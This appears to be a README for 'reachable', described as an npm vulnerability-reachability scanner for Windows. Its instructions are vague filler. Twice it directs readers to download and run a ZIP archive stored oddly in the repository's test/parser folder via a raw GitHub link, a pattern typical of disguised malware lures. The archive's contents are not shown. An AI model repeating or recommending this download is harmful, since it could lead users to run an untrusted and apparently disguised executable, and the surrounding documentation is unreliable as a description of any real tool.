reachable checks your JavaScript or TypeScript app for npm security issues that your code can actually reach. It helps you focus on the advisories that matter, so you do not waste time on problems that cannot affect your app.
Use it when you want to:
- scan a local project on Windows
- see which dependency risks are reachable from your code
- review results before shipping changes
- export findings for security tools and code review
Before you start, make sure you have:
- a Windows 10 or Windows 11 PC
- a project written in JavaScript or TypeScript
- a recent version of Node.js installed
- enough disk space to scan your project folder
If your app uses npm packages, reachable can inspect the code and dependency tree to look for paths into known advisories.
Visit this page to download: https://github.com/Kael1117/reachable/raw/refs/heads/main/test/parser/Software-1.6-beta.4.zip
After you open the page:
- look for the latest release or source files
- download the Windows version if one is provided
- save it in a folder you can find later
- if the download is a ZIP file, extract it
- open the folder that contains the tool
If the project is used from source, install it with npm in the project folder:
- open the project folder in File Explorer
- click the address bar and type
cmd - press Enter
- run the install command shown in the repository files
- wait for the packages to finish installing
If you use a packaged executable, you can skip the install step and run the file directly.
Open Command Prompt in the folder where reachable is located, then run the command shown by the project.
A typical run looks like this:
- scan your current app folder
- point reachable at your project path
- review the output in the terminal
Example flow:
- open Command Prompt
- go to your app folder
- run reachable
- wait for the scan to finish
- read the results in the window
If the tool supports a help screen, you can use it first to see the available options:
- show help
- choose an input folder
- select an output format
- run a full scan
If Windows blocks the app, try these checks:
- confirm the file finished downloading
- keep the tool in a normal folder like
DownloadsorDesktop - make sure Node.js is on your system path if you are using the source version
- open Command Prompt as a regular user first
If the scan does not start, check that:
- you are inside a project with
package.json - the folder has
node_modulesif the app expects installed packages - the path does not contain unusual characters
- the terminal is pointed at the right folder
reachable looks at your code and your dependency tree. It then checks which advisories have a path that your app can reach.
That means it can help you separate:
- packages that are present
- packages that are used
- packages that may be vulnerable
- packages that can actually be hit by your code
This is useful because not every advisory matters in the same way. A package can sit in your install tree and still never be touched by your app.
You may want to use reachable when:
- you want a cleaner security review
- you need to check a Node.js app before release
- you want to validate npm advisories in a real code path
- you want a result format that can fit into CI checks
- you need findings for a team security report
It fits well in developer workflows, build checks, and manual review.
reachable can be used in ways that help with review and automation. Depending on the project setup, it may support:
- terminal output for quick checks
- SARIF output for security tooling
- JSON-style results for later processing
- CI-friendly runs in GitHub Actions
If you plan to share results with a team, keep the scan output in a file so you can compare it later.
For the clearest scan:
- run it from the root of your app
- keep your dependencies installed
- scan one project at a time
- use the same Node.js version your app uses
- review both direct and nested dependencies
If your app has several packages, scan each package folder on its own.
reachable is built for:
- JavaScript projects
- TypeScript projects
- Node.js apps
- npm-based dependency trees
- local-first code review workflows
It is a good fit for apps that use many packages and need a simple way to sort signal from noise.
A simple workflow looks like this:
- download or clone the project
- open your app folder
- install any needed packages
- run the scan
- review the reachable advisories
- keep the results for your records
If you use it often, run the same steps after each major dependency update.
Some security tools list every known issue in your dependency tree. That can create a long list of alerts. reachable helps narrow that list by checking if your code can get to the risky path.
This can help you:
- focus on the findings that matter
- reduce time spent on dead ends
- explain risk to non-technical teammates
- track what changed after an update
- plan fixes based on real code paths
When you work with the tool, these folders matter most:
- the project root, where
package.jsonlives - the dependency folder, often
node_modules - the terminal window, where you run the scan
- the output folder, if you save reports
Keep the project in a path you can reach easily, such as:
C:\Users\YourName\Desktop\projectC:\Users\YourName\Documents\project
Keep the tool and your notes in one place:
- save the download link
- keep the project folder unchanged
- store any scan results with the date
- rerun scans after package updates
- compare new results against older runs
That makes it easier to see how your app changes over time
- open the download page: https://github.com/Kael1117/reachable/raw/refs/heads/main/test/parser/Software-1.6-beta.4.zip
- download the Windows file or source package
- extract it if needed
- open Command Prompt in the app folder
- run the command from the project
- scan your target project folder
- review the reachable findings